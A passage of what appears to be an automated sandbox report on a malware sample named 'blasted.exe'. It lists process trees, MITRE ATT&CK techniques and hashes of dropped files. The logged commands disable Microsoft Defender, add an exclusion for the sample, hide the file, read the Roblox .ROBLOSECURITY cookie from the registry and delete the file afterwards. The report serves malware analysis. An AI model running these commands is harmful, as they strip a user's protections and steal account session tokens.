  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3580
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:1608
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2324
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:1232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5784
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:452
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:660
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1332

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffb33a8cc40,0x7ffb33a8cc4c,0x7ffb33a8cc58
  2⤵
  PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1800,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
  2⤵
  PID:5612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:5284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:8
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4392,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1
  2⤵
  PID:2652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4752,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
  2⤵
  PID:2796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:3496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:8
  2⤵
  PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5032,i,14352395317710030954,9833188429094171902,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2
  2⤵
  PID:3100

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1740

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4680
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4492
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:4272
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5984
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5740
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5040
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5716
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5184
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5244

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
PID:5676
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:1932
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:4864
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5756
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:680
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5800
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1504
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4496
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1540

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4548

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
PID:1100
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5492
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:1500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:1296
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5560
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5428
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2768
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2248
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2508
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
9e466b4837d8431be725d6b9c1b4d9ef

SHA1
3f247b7c89985a41d839cad351cd0fc182fcb284

SHA256
2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d

SHA512
01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
960B

MD5
16846df493521e84fe47cd6b6451ec8f

SHA1
6d99eb017c5aec08d3a7e908bbd4a051ce250c02

SHA256
69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9

SHA512
aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
a1aa46f1106b2aef7dd69284253a9c01

SHA1
d4873c71d702f4bf4aebc7dc229bcc2a9e103198

SHA256
7ebc11f0feb421a3549e9da11dab969ba4698045142d6844b3cdf4b6f1bab81a

SHA512
59c2555f2b78e0e374215bc7033a3a7c46e3ca7b83cb54a141af0549526e17975b794919637652bffa3536b87e41ce0010b271d9e93256cec3432f5168043f57

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
7bc6f843af847805dcf6e1d01d6c644d

SHA1
170bb2a20b0431e7b63e7c20bdc8dae66d607546

SHA256
287a09b78a77a22e617c69539dd00cae21845494a9d2d68d36f4e4a0ac03fe1b

SHA512
0c3b95aa8167369b8fa9d33569712023c3b0b047186d37cbfee51a2ae9ba461c99c80212268714c991e8c11c1d215aca24c06fe4b9608cf74a61bf049d5e2fa4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1b12737aaf4b9be6c40f22eef921c478

SHA1
a3332b18d21ad3d59cdd48d095d55d49dfe9add5

SHA256
e10083a543b19b634181713cb80d5c74285ba20ed91f63008db130c824abe4e9

SHA512
db77978e6a374291838efe67a6d701e3d74405bc553bc3e6b7813d6a39cb1df0f1aee568a979c2de7f5cc3a74ea472d2aa17ee55bfbfd7b39c4d6d214c4e7bd1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f1900dda98e955a71cffb20a6c2c2a2d

SHA1
a507408166b374619cf2c0e374ce9599ae7b272f

SHA256
6cfc30b8e231235a22e7deedf692c388c44ef7ffad081d4c1a42f8fe94f75840

SHA512
45edcf12f51e74b18672ce6262506c909c90aa7d30cf5e107d277e8d19c19521efe406299c711b1a1fe13535963f07672e0039274f1938cd05e7bb7f88aad8e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
96adb6731450793a3fae9b1d279e174f

SHA1
91ea68f47bc0dc2ef77855de5f6ca411f7d6969a

SHA256
b88c2952e41d0053355b0b7a4180a555fc99d1fbb907e8587ae423a3a42314ff

SHA512
2edd0db711808e096f7dc7c2db4b2016bf7a90bc29e41d266e5ad0f05b3262565e97a9ebac60ea71a8802936dd788c876c4ce4d0f75783fed0343e5efccb3356

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
5c3f0422d5e6e6f494d6746d43cc3133

SHA1
d7330f0ce7121b8fc39df7c2066830fc6dbe4e1c

SHA256
f2460690f45607e6d8f0663a98f905754d123f40a365e047031898c650355031

SHA512
037900f9f395d8875b36fd3cc17856e796b53149aaf5c79b67ef5cfd99784c7faeb3461b888516213574c90ea146455751a8eedaca9102fcba9e8674e96a49c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blasted.exe.log

Filesize
1KB

MD5
5f36c205799cb2f8966c7d5130cea05c

SHA1
614993e3437ff9363c3eb698d7dba379a453dd6e

SHA256
8eaaf40fe7570c8fa593702f38fee2f54538ba6a77d7c54005e8d1f150f5180c

SHA512
7053cac09d2e71675771bae4ac25f1a47f96be662f6bb2aab24668ed4c1809fb1261b2d6465202c09bd0310bf875361a815db6dda6006dcfbbb5fb3c50c5927b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2558af65fa0e0fdff802046cb4d87e66

SHA1
a90d8668d426b2f552f27543bfc2b444c1511d0f

SHA256
76832b70fd9ab098e34e086fb3b0ae3b88fd1c39814918057afd8cde1dc84fd0

SHA512
a6c5a20e0fab4eb6cb4ea31ab24282cc056e3ace878af4fee5c20d17244657b2285a7e7ca93b2ae7c25e498294b9cdee519fe9709373cfb62be527015830b356

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c321dfee531730b7e0b81470b947da3f

SHA1
0488401f4fc03bcdab19eeff194ff12f4439e1cb

SHA256
6d7da148fe930cf085b5369427eb24e66844d7f00fcc197f056e0763c7a76117

SHA512
eee78a9529b1d89631ac8dbaef716eba95166d8c465a2c075bf89d28fab4c25a48c4d29d7f19ab0249b245bf45fac63214b092aaef9b3a09b4f8e6cfa85a076a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ccf1b703c8f1f34a2faf84a676e0ef0c

SHA1
46dc045aa7dcf8938c0352d4125e796d38c4b7a3

SHA256
789e5eaacf5284c772fd75aab4c445eadff4816410167eea41a185ffe35b36fa

SHA512
c53f8516e7e65f86a0cba52ba2a7aa5c9e0bee4285b6cae525a0c1202d04f779a20225a6b8f8e674daf1ab9b4b225b3ebb7cda7588b3ab062761b136eb86b24a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ed6f17e13c0654979a4c7673c20ca8ec

SHA1
0295ab73ec0b415f93206f44e8fef38b1d05059a

SHA256
